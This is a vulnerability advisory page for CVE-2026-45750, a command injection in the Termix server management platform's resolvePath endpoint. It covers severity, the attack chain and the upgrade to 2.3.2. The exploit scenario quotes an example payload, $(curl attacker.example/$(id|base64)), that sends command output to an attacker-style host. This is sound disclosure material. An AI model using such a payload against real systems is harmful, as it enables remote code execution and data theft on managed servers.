Skip to main content

Termix CVE-2026-45750

| EUVDEUVD-2026-34878 CRITICAL
OS Command Injection (CWE-78)
2026-06-05 GitHub_M
9.0
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.0 CRITICAL
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Patch available
Jun 05, 2026 - 20:02 EUVD
Source Code Evidence Fetched
Jun 05, 2026 - 18:37 vuln.today
Analysis Generated
Jun 05, 2026 - 18:37 vuln.today

DescriptionGitHub Advisory

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the GET /ssh/file_manager/ssh/resolvePath endpoint in the Termix File Manager component unsafely processes the path parameter and embeds it into a shell command executed over the active SSH session. Because the user-controlled value is placed inside double quotes and only double quotes are escaped, shell command substitution syntax such as $(...) is still interpreted by the remote shell. Version 2.3.2 fixes the issue.

AnalysisAI

Command injection in Termix server management platform before version 2.3.2 allows authenticated users to execute arbitrary shell commands on remote SSH-managed hosts via the File Manager's resolvePath endpoint. The flaw stems from incomplete shell escaping that only handles double quotes while leaving command substitution syntax interpretable. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate to Termix web UI
Delivery
Open SSH session to target host
Exploit
Send crafted resolvePath request with $(...) payload
Install
Termix embeds path in shell command
C2
Remote shell evaluates command substitution
Execute
Attacker command executes on managed host
Impact
Pivot across all Termix-connected servers

Vulnerability AssessmentAI

Exploitation An attacker needs a valid Termix account with permission to use the File Manager component and an already-established SSH session to a target host (PR:L plus UI:R in the CVSS vector reflect this prerequisite). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H produces a 9.0 score driven primarily by the changed scope: the vulnerable Termix web component executes the injected command on a different security authority (the remote SSH host), so a compromise of one Termix tenant can pivot into every connected server. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A low-privilege Termix user with access to the File Manager component crafts a request to GET /ssh/file_manager/ssh/resolvePath where the path parameter contains a $(...) substitution such as $(curl attacker.example/$(id|base64)). When Termix opens the active SSH session and embeds the value inside the double-quoted shell command, the remote shell evaluates the substitution and executes the attacker's command on the managed host. …
Remediation Vendor-released patch: upgrade Termix to version 2.3.2 or later, available from https://github.com/Termix-SSH/Termix/releases/tag/release-2.3.2-tag for Windows, Linux (x64 and ARM64), and macOS. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 hours: Inventory all Termix deployments and versions; immediately restrict File Manager access to essential administrators only; audit recent access logs for exploitation attempts. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Termix

View all
CVE-2025-59951 CRITICAL POC
9.1 Oct 01

Docker default credentials in Termix server management. PoC and patch available.

CVE-2026-22804 HIGH POC
8.0 Jan 12

Stored XSS in Termix File Manager (versions 1.7.0-1.9.0) allows attackers with SSH server access to execute arbitrary Ja

CVE-2026-45744 CRITICAL
9.9 Jun 05

Remote command execution in Termix web-based server management platform (versions prior to 2.3.2) allows any authenticat

CVE-2026-45748 CRITICAL
9.8 Jun 05

OS command injection in Termix web-based server management platform prior to version 2.3.2 allows remote unauthenticated

CVE-2026-45746 CRITICAL
9.0 Jun 05

Cross-tenant remote code execution in Termix (web-based SSH/file management platform) prior to version 2.3.2 allows an a

CVE-2026-42453 HIGH
8.7 May 08

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to v

CVE-2026-45749 HIGH
8.1 Jun 05

Authentication bypass of MFA in Termix versions prior to 2.3.2 allows an attacker who already holds a victim's account p

CVE-2026-45743 HIGH
8.1 Jun 05

Cross-tenant SSH session hijacking in Termix versions prior to 2.3.2 allows any authenticated user to fully control anot

CVE-2026-42452 HIGH
8.1 May 08

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to v

CVE-2026-45745 HIGH
8.0 Jun 05

Machine-in-the-middle interception of HTTPS traffic in Termix Desktop (Electron) starting at version 1.7.0 allows attack

Share

CVE-2026-45750 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy